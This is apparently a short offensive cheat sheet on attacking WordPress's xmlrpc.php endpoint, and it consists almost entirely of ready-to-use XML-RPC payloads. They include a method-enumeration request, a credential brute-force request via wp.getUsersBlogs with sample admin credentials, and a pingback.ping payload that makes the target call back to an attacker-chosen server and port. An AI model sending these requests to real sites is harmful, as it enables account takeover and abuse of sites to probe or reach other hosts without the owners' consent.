Skip to main content

XML-RPC

POST to /xmlrpc.php

List Methods

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Brute force credentials

  • wp.getUserBlogs
  • wp.getCategories
  • metaWeblog.getUsersBlogs
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

PingBack

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>